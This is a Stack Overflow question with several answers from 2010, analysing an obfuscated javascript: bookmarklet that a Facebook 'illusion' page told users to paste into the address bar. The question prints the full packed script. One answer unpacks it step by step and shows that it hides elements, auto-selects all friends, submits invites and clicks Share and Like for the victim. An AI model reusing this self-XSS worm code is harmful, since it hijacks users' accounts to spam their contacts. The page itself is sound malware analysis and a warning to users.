tags:

views:

449

answers:

4
+10  Q: 

What is this weird script I found on facebook?

Not so much a question to help my own programming, but I found this page on facebook with a cool illusion and a page that says "to see the real illusion, copy and paste this code into your address bar" and there is a script:

DISCLAIMER: DO NOT RUN THE FOLLOWING CODE

javascript:(function(){a='app129556453726651_fsDszN';
b='app129556453726651_rcgAmd';
rhsjGW='app129556453726651_rhsjGW';SqmbQL='app129556453726651_SqmbQL';
kPtsfs='app129556453726651_kPtsfs';
eval(function(p,a,c,k,e,r){e=function(c)
{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e)
{return r[e]}];e=function(){return'\\w+'};c=1};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}
('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];
d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);
s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g])
{F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);
',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||kPtsfs|fs|SocialGraphManager|for|in|if|20|SqmbQL|rhsjGW|21|2000|4000|3000'.split('|'),0,{}))})();

What the hell is this? What would happen if I put it in my address bar, which I assume would be a very unwise idea?

I am confused.

+2  A: 

Malicious Code

document.getElementById('app129556453726651_kPtsfs').style.visibility = 'hidden';
document.getElementById('app129556453726651_fsDszN').innerHTML = document.getElementById('app129556453726651_rcgAmd').value;
var s = document.getElementById('suggest');
var m = document.getElementById('likeme');
var sl = document.getElementById('slink');
var c = document.createEvent("MouseEvents");
c.initEvent('click', true, true);
s.dispatchEvent(c);
setTimeout(function () {
    fs.select_all()
    SocialGraphManager.submitDialog('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
    setTimeout(function () {
        c.initEvent('click', true, true);
        sl.dispatchEvent(c);
        setTimeout(function () {
            var inp = document.getElementsByTagName('input');
            for (i in inp) {
                if (inp[i].value == 'Share') {
                    inp[i].dispatchEvent(c)
                }
            };
            m.dispatchEvent(c);
            setTimeout(function () {
                document.getElementById('app129556453726651_SqmbQL').innerHTML = document.getElementById('app129556453726651_rhsjGW').value;
            }, 2000)
        }, 4000)
    }, 3000)
}, 5000);
M28  2010-05-30 16:38:15
+3  A: 

This question comes up every day now...

It is code that invites all your friends to join a group (or something similar). Then the group starts spamming advertisements at it's members.

Coronatus  2010-05-30 16:39:23
+4  A: 

It is a facebook 'virus' of sort.. it actually invites all your friends to an app named socialgraph

reference: http://davezor.posterous.com/reverse-engineering-the-newest-facebook-invit

Gaby  2010-05-30 16:44:09
+56  A: 

It's unclear at first what that code does (as it is intended to be) so to answer your question, the code has to be unpacked. Just so you can follow my thinking, I'm including every step of the unobfuscation here.

This is the current form of the script with line breaks added:

(function() {
    a='app129556453726651_fsDszN';
    b='app129556453726651_rcgAmd';
    rhsjGW='app129556453726651_rhsjGW';
    SqmbQL='app129556453726651_SqmbQL';
    kPtsfs='app129556453726651_kPtsfs';

    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||kPtsfs|fs|SocialGraphManager|for|in|if|20|SqmbQL|rhsjGW|21|2000|4000|3000'.split('|'),0,{}))
})();

As we can see, the script itself is a function inside a self calling closure that will execute instantly when the script is processed. The script contains some cryptic variables and some code packed with Edward's packer. When we unpack the code using an unpacker like this, we get the following form (line breaks added):

(function(){
    a='app129556453726651_fsDszN';
    b='app129556453726651_rcgAmd';
    rhsjGW='app129556453726651_rhsjGW';
    SqmbQL='app129556453726651_SqmbQL';
    kPtsfs='app129556453726651_kPtsfs';

    var variables = [
        "\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
        "\x73\x74\x79\x6C\x65",
        "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
        "\x68\x69\x64\x64\x65\x6E",
        "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
        "\x76\x61\x6C\x75\x65",
        "\x73\x75\x67\x67\x65\x73\x74",
        "\x6C\x69\x6B\x65\x6D\x65",
        "\x73\x6C\x69\x6E\x6B",
        "\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73",
        "\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74",
        "\x63\x6C\x69\x63\x6B",
        "\x69\x6E\x69\x74\x45\x76\x65\x6E\x74",
        "\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74",
        "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
        "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
        "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
        "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
        "\x69\x6E\x70\x75\x74",
        "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65",
        "\x53\x68\x61\x72\x65",
        "\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"];

    d = document;
    d[variables[2]](kPtsfs)[variables[1]][variables[0]] = variables[3];
    d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
    s = d[variables[2]](variables[6]);
    m = d[variables[2]](variables[7]);
    sl = d[variables[2]](variables[8]);
    c = d[variables[10]](variables[9]);
    c[variables[12]](variables[11], true, true);
    s[variables[13]](c);

    setTimeout(function () {
        fs[variables[14]]()
    }, 5000);

    setTimeout(function () {
        SocialGraphManager[variables[17]](variables[15], variables[16]);
        setTimeout(function () {
            c[variables[12]](variables[11], true, true);
            sl[variables[13]](c);
            setTimeout(function () {
                inp = document[variables[19]](variables[18]);
                for (i in inp) {
                    if (inp[i][variables[5]] == variables[20]) {
                        inp[i][variables[13]](c)
                    }
                };
                m[variables[13]](c);
                setTimeout(function () {
                    d[variables[2]](SqmbQL)[variables[4]] = d[variables[2]](rhsjGW)[variables[5]];
                }, 2000)
            }, 4000)
        }, 3000)
    }, 5000);
})();

We can instantly see from that that the code is executing commands in specific intervals, first after 5 seconds, then three, then four and finally after two seconds. The beginning of the script contains some hex encoded variables that can be decoded to this:

var variables = [
    "visibility",
    "style",
    "getElementById",
    "hidden",
    "innerHTML",
    "value",
    "suggest",
    "likeme",
    "slink",
    "MouseEvents",
    "createEvent",
    "click",
    "initEvent",
    "dispatchEvent",
    "select_all",
    "sgm_invite_form",
    "/ajax/social_graph/invite_dialog.php",
    "submitDialog",
    "input",
    "getElementsByTagName",
    "Share",
    "pop_content"];

By substituting those variables into the code, we get:

(function(){
    a='app129556453726651_fsDszN';
    b='app129556453726651_rcgAmd';
    rhsjGW='app129556453726651_rhsjGW';
    SqmbQL='app129556453726651_SqmbQL';
    kPtsfs='app129556453726651_kPtsfs';

    d = document;
    d["getElementById"](kPtsfs)["style"]["visibility"] = "hidden";
    d["getElementById"](a)["innerHTML"] = d["getElementById"](b)["value"];
    s = d["getElementById"]("suggest");
    m = d["getElementById"]("likeme");
    sl = d["getElementById"]("slink");
    c = d["createEvent"]("MouseEvents");
    c["initEvent"]("click", true, true);
    s["dispatchEvent"](c);

    setTimeout(function () {
        fs["select_all"]()
    }, 5000);

    setTimeout(function () {
        SocialGraphManager["submitDialog"]("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
        setTimeout(function () {
            c["initEvent"]("click", true, true);
            sl["dispatchEvent"](c);
            setTimeout(function () {
                inp = document["getElementsByTagName"]("input");
                for (i in inp) {
                    if (inp[i]["value"] == "Share") {
                        inp[i]["dispatchEvent"](c)
                    }
                };
                m["dispatchEvent"](c);
                setTimeout(function () {
                    d["getElementById"](SqmbQL)["innerHTML"] = d["getElementById"](rhsjGW)["value"];
                }, 2000)
            }, 4000)
        }, 3000)
    }, 5000);
})();

And as we know that document['getElementById'] is the same as document.getElementById, we can clean up the code so it finally becomes readable. I've also done variable replacement and separated the setTimeouts for readability:

(function(){
    document.getElementById('app129556453726651_kPtsfs').style.visibility = "hidden";
    document.getElementById('app129556453726651_fsDszN').innerHTML = document.getElementById('app129556453726651_rcgAmd').value;
    s = document.getElementById("suggest");
    m = document.getElementById("likeme");
    sl = document.getElementById("slink");
    c = document.createEvent("MouseEvents");
    c.initEvent("click", true, true);
    s.dispatchEvent(c);

    setTimeout(function () {
        fs.select_all()
    }, 5000);

    setTimeout(function () {
        SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
    }, 5000);

    setTimeout(function () {
        c.initEvent("click", true, true);
        sl.dispatchEvent(c);
    }, 8000);

    setTimeout(function () {
        inp = document.getElementsByTagName("input");                    
        for (i in inp) {
            if (inp[i].value == "Share") {
                inp[i].dispatchEvent(c);
            }
        };                    
        m.dispatchEvent(c);                
    }, 12000);

    setTimeout(function () {
        document.getElementById('app129556453726651_SqmbQL').innerHTML = document.getElementById('app129556453726651_rhsjGW').value;
    }, 14000);
})();

Now, without knowing much of how Facebook works, this indeed looks malicious, sharing stuff you might not want to share etc. Hope that helps, the main idea of this post was to show how you can decrypt scripts like this yourself also. :)

Tatu Ulmanen  2010-05-30 16:59:31
+1. Top work :-)
richsage  2010-05-30 18:33:04
That is a very cool description/deciphering of that code. Very inspiring!
Chau  2010-05-30 18:47:56
wow, thanks very much, that was very cool. I don't think I could've done that.
Mike Turley  2010-05-31 04:03:18
Impressive work. +1
Norman Ramsey  2010-05-31 14:25:08

related questions

What JavaScript patterns do you use most?
Javascript events
What style do you use for creating an "class" in JavaScript?
Graphing JavaScript Library
What's the difference in closure style
Getting the text from a drop-down box
How to specify javascript to run when ModalPopupExtender is shown
Length of Javascript Associative Array
How Do I Post and then redirect to an external URL from ASP.Net?
How to set up a CSS switcher in ASP.NET
Wrapping lists into columns
Javascript keyboard events primer? (or rather: help me with my custom dropdown)
Http Auth in a Firefox 3 bookmarklet
Best Debugging Tools for JavaScript/xulrunner Development
How can I turn a string of HTML into a DOM object in a Firefox extension?
Call ASP.NET Function From Javascript?
Javascript troubleshooting tools in IE
MAC addresses in JavaScript
Capturing TAB key in text box
CSS Background Color in Javascript
How can I make the browser see CSS and Javascript changes?
Triple Quotes? How do I delimit a databound Javascript string parameter in ASP.NET?
ASP .Net Custom Client-Side Validation
What JavaScript library would you choose for a new project and why?
Detecting font in JavaScript